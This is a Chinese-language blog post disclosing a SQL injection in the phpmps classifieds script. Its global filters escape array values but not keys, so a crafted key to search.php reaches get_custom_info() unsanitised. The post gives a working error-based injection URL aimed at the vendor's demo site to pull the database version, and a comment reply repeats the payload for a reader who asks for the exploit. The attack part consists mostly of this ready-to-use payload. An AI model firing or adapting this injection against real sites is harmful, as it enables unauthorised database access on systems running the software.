phpmps弱过滤导致注入漏洞

首先全局过滤文件 addslashes_deep和sql_replace全部是针对数组的value的

所以 key呢。。。

由于key被忽视 所以在/search.php 下

get_custom_info($key)

在function get_custom_info($cusid=”)里面

直接查询了

导致注入

http://www.phpmps.com/demo/search.php?custom[xss%27)%20AND%20(SELECT%208734%20FROM(SELECT%20COUNT(*),CONCAT(@@version,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%23]=1

返回信息,成功获取版本信息:

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录

  • 2 Responses to “phpmps弱过滤导致注入漏洞”
    • 菜鸟求指点

      求楼主详细exp语句 表示没看懂那个拼接sql语句

      • search.php?custom[xss%27)%20AND%20(SELECT%208734%20FROM(SELECT%20COUNT(*),CONCAT(@@version,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%23]=1

        关于这个exp的信息,就是报错注入而已

        http://fuck.0day5.com/archives/603.html